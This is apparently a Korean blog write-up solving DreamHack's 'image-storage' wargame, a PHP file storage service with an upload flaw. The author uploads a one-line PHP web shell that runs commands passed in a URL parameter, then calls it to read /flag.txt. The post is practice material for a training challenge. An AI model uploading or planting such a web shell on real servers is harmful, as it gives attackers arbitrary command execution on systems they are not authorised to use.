728x90
오늘은 DreamHacker의 웹 해킹 워게임 중 하나인 image-storage를 함께 풀어볼 예정이다.
image-storage
php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic
dreamhack.io
## 문제 설명:
문제 정보를 살펴보면 파일 업로드 취약점을 활용하여 flag를 획득하면 되는 것으로 보인다.
## 문제 풀이
사이트에 접속해보니 다음과 화면이 보인다.
Upload 버튼을 클릭하면 다음과 같이 파일을 업로드할 수 있는 화면이 출력된다.
간단한 웹쉘을 작성하여 업로드해보겠다.
<?php
system($_GET["cmd"]);
?>
List를 확인해보면 우리가 올린 webshell이 존재한 것을 알 수 있다.
webshell을 호출하여 /flag.txt의 내용을 읽으면 다음과 같이 성공적으로 flag값이 출력된 것을 확인할 수 있다.
'Wargame > DreamHack' 카테고리의 다른 글
| [DreamHack 워게임] command-injection (0) | 2023.04.04 |
|---|---|
| [DreamHack 워게임] login-1 (0) | 2023.04.03 |
| [DreamHack 워게임] simple-ssti (0) | 2023.04.01 |
| [DreamHack 워게임] csrf-1 (0) | 2023.03.31 |
| [DreamHack 워게임] cookie (0) | 2023.03.30 |
